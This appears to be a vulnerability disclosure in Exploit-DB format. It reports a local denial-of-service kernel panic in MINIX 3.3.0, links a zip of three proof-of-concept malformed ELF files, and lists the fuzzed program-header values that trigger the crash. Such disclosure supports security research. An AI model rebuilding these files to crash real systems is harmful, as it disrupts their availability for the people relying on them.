扫码分享
验证:
体验盒子# Exploit Title: MINIX 3.3.0 Local Denial of Service
# Exploit Author: nitr0us
# Vendor Homepage: www.minix3.org
# Software Link: http://www.minix3.org/download/index.html
# Version: 3.3.0
# Tested on: MINIX 3.3.0 x86
Attached three PoCs (malformed ELFs) and a screenshot of the panic.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35173.zip
----
MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable.
Attached three PoCs that panicked the OS, and their modified fields:
=================================================================================
[+] Malformed ELF: 'orc_0064':
[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_vaddr = 0x08056919, p_paddr = 0xcafed00d) | PHT[0] rule [03]
executed
(PHT[0]->p_flags = 0xf0000005) | PHT[0] rule [10] executed
(PHT[0]->p_flags = 0xfff00005) | PHT[0] rule [15] executed
(PHT[3]->p_type = 0x0) | PHT[3] rule [01] executed
(PHT[3]->p_vaddr = 0x1905af52, p_paddr = 0x1905af52) | PHT[3] rule [03]
executed
(PHT[3]->p_type = 0x70031337) | PHT[3] rule [06] executed
(PHT[PT_LOAD].p_vaddr reordered [descending]) | PHT rule [20] executed
=================================================================================
[+] Malformed ELF: 'orc_0090':
[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_offset = 0xffff0000) | PHT[0] rule [02] executed
(PHT[3]->p_type = 0x7defaced) | PHT[3] rule [06] executed
=================================================================================
[+] Malformed ELF: 'orc_0092':
[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_filesz = 0x0004fdec, p_memsz = 0x41424344) | PHT[0] rule [04]
executed
(PHT[3]->p_type = 0x6fffffff) | PHT[3] rule [14]
=================================================================================
体验盒子
